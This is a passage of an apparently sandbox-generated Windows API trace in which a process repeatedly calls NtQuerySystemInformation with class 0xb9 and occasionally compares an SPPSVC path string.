ResultLength=0x0) [0274.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.273] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x40, ResultLength=0x0) [0274.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdda0, Length=0x40, ResultLength=0x0) [0274.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x40, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd00, Length=0x40, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc20, Length=0x30, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb28, Length=0x30, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0274.281] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x28, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0274.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd880, Length=0x28, ResultLength=0x0) [0274.290] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd900, Length=0x50, ResultLength=0x0) [0274.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd660, Length=0x28, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6d0, Length=0x28, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0274.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd750, Length=0x28, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd630, Length=0x20, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd830, Length=0x38, ResultLength=0x0) [0274.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x20, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd640, Length=0x20, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde40, Length=0x20, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbf0, Length=0x28, ResultLength=0x0) [0274.299] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0274.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0274.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda40, Length=0x28, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x28, ResultLength=0x0) [0274.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x28, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x20, ResultLength=0x0) [0274.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x20, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdba0, Length=0x38, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x20, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x20, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda20, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x50, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x28, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6e0, Length=0x28, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd840, Length=0x38, ResultLength=0x0) [0274.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 